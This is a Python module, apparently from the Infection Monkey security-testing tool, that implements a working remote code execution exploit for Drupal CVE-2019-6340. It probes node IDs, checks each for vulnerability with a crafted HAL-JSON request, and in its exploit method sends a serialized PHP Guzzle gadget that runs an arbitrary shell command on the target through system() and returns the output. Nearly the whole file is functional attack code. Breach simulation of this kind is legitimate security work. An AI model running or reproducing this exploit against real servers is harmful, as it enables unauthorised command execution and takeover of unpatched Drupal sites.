"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
    https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""

import logging
import re

import requests
from urllib.parse import urljoin, urlparse

from infection_monkey.exploit.web_rce import WebRCE

__author__ = 'Ophir Harpaz'

LOG = logging.getLogger(__name__)


def remove_port(url):
    """
    Strip an explicit ':port' suffix from a URL, keeping only scheme and host.

    :param url: a full URL, e.g. 'http://172.1.2.3:80/node/3'
    :return: 'scheme://host' without the port, e.g. 'http://172.1.2.3'
    """
    parsed = urlparse(url)
    with_port = f'{parsed.scheme}://{parsed.netloc}'
    # netloc may carry ':<port>'; drop it so payload hrefs match Drupal's own links.
    without_port = re.sub(':[0-9]+$', '', with_port)
    return without_port


def build_url(*args) -> str:
    """
    Join URL fragments left-to-right with urljoin.

    NOTE: urljoin semantics apply — a fragment without a trailing slash is
    *replaced* by the next one rather than extended, so callers must pass
    base URLs ending in '/' (e.g. '.../node/') for plain concatenation.

    :param args: URL fragments, joined in order
    :return: the combined URL
    """
    url = ''
    for fragment in args:
        url = urljoin(url, fragment)
    return url


def check_drupal_cache(r: requests.Response) -> bool:
    """
    Check whether a response was served from Drupal's page cache.

    :param r: HTTP response to inspect
    :return: True iff the 'X-Drupal-Cache' header is present with value 'HIT'
    """
    return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'


def find_articles(base_url: str, lower: int = 1, upper: int = 10):
    """
    Find target node (article) IDs that do not 404 and are not cached.

    A cached node cannot be exploited (the cached response is replayed instead
    of deserializing our payload), so cached IDs are skipped, not collected.

    :param base_url: base URL of the site, ending with 'node/'
    :param lower: first node ID to probe (inclusive)
    :param upper: last node ID to probe (exclusive)
    :return: set of usable node IDs (possibly empty)
    """
    articles = set()
    while lower < upper:
        u = build_url(base_url, str(lower))
        r = requests.get(u)
        if r.status_code == 200:  # found an article
            if check_drupal_cache(r):
                # Bug fix: cached articles were previously added to the result
                # set anyway, despite being logged as "skipping". They are
                # useless for exploitation, so they are now genuinely skipped.
                LOG.info(f'Found a cached article at: {lower}, skipping')
            else:
                articles.add(lower)
        lower += 1
    return articles


class DrupalExploiter(WebRCE):
    """Exploiter for CVE-2019-6340 (Drupal REST RCE via unsafe deserialization)."""

    _TARGET_OS_TYPE = ['linux', 'windows']
    _EXPLOITED_SERVICE = 'Drupal Server'
    DRUPAL_PORTS = [[80, False], [443, True]]  # [port, use_ssl]

    def __init__(self, host):
        super(DrupalExploiter, self).__init__(host)

    def get_exploit_config(self):
        """
        We override this function because the exploit requires a special extension in the URL, "node",
        e.g. an exploited URL would be http://172.1.2.3:/node/3.

        :return: the Drupal exploit config
        """
        exploit_config = super(DrupalExploiter, self).get_exploit_config()
        exploit_config['url_extensions'] = ['node/']
        return exploit_config

    def add_vulnerable_urls(self, potential_urls, stop_checking=False):
        """
        We need a specific implementation of this function in order to add the URLs *with the node IDs*.
        We therefore check, for every potential URL, all possible node IDs.

        :param potential_urls: Potentially-vulnerable URLs
        :param stop_checking: Stop as soon as one vulnerable URL is found
        :return: None (in-place addition to self.vulnerable_urls)
        """
        for url in potential_urls:
            node_ids = find_articles(url)
            # Bug fix: find_articles() always returns a set (never None), so an
            # identity check against None could never catch the "no nodes found"
            # case — test for emptiness instead.
            if not node_ids:
                LOG.info('Could not find a Drupal node to attack')
                continue
            for node_id in node_ids:
                node_url = build_url(url, str(node_id))
                if self.check_if_exploitable(node_url):
                    self.add_vuln_url(url)  # noqa: kept for parity with base-class bookkeeping
                    self.vulnerable_urls.append(node_url)
                    if stop_checking:
                        break
            # Bug fix: the original only broke the inner loop, so with
            # stop_checking=True the remaining potential URLs were still
            # scanned. Stop the outer loop too once a vulnerable URL is found.
            if stop_checking and self.vulnerable_urls:
                break
        if not self.vulnerable_urls:
            LOG.info("No vulnerable urls found")

    def check_if_exploitable(self, url):
        """
        Check if a certain URL is exploitable.
        We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
        a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic:
        a vulnerable server deserializes the request body even on GET and echoes a telltale error string.

        :param url: Drupal node URL (including port), e.g. http://172.1.2.3:80/node/3
        :return: True if the URL looks exploitable, otherwise False
        """
        payload = {
            "_links": {
                "type": {
                    # Deliberately-invalid entity type: a vulnerable server complains about it.
                    "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
                }
            },
            "type": {
                "target_id": "article"
            },
            "title": {
                "value": "My Article"
            },
            "body": {
                "value": ""
            }
        }

        # GET with a JSON body is intentional — that is the CVE-2019-6340 vector.
        response = requests.get(f'{url}?_format=hal_json',
                                json=payload,
                                headers={"Content-Type": "application/hal+json"})

        if check_drupal_cache(response):
            LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
            return False

        return 'INVALID_VALUE does not correspond to an entity on this site' in response.text

    def exploit(self, url, command):
        """
        Run `command` on the target by sending a serialized Guzzle FnStream
        gadget through the vulnerable REST endpoint.

        :param url: vulnerable node URL (including port)
        :param command: shell command to execute on the target
        :return: command output (text after the '----' marker)
        """
        # Prefix a marker for an easy search-and-replace of the output:
        cmd = 'echo ---- && ' + command
        base = remove_port(url)
        payload = {
            "link": [
                {
                    "value": "link",
                    # Serialized PHP object-injection gadget (GuzzleHttp\Psr7\FnStream);
                    # |size| / |command| are patched in below. Do not reformat this string.
                    "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
                               "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
                               "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
                               "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
                               "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
                               "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
                               "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
                               "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
                               "".replace('|size|', str(len(cmd))).replace('|command|', cmd)
                }
            ],
            "_links": {
                "type": {
                    "href": f"{urljoin(base, '/rest/type/shortcut/default')}"
                }
            }
        }

        LOG.info(payload)

        r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})

        if check_drupal_cache(r):
            LOG.info(f'Exploiting {url} returned cache HIT, may have failed')

        if '----' not in r.text:
            LOG.info('[warn] Command execution _may_ have failed')

        # Everything after the marker is the command's output.
        result = r.text.split('----')[-1]
        LOG.info(f'Drupal exploit result = {result}')
        return result

    def get_target_url(self):
        """
        We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
        Reusing the same URL eliminates its exploitability because of caching reasons :)

        :return: vulnerable URL to exploit
        """
        return self.vulnerable_urls.pop()